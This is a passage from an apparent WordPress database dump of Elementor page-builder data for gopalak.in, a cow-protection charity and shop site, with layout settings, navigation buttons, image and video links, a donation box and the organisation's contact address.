here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11501,1912,'_elementor_page_assets','a:0:{}'),(11511,1914,'_elementor_edit_mode','builder'),(11512,1914,'_elementor_template_type','wp-page'),(11513,1914,'_elementor_version','3.7.8'),(11514,1914,'_wp_page_template','elementor_canvas'),(11515,1914,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\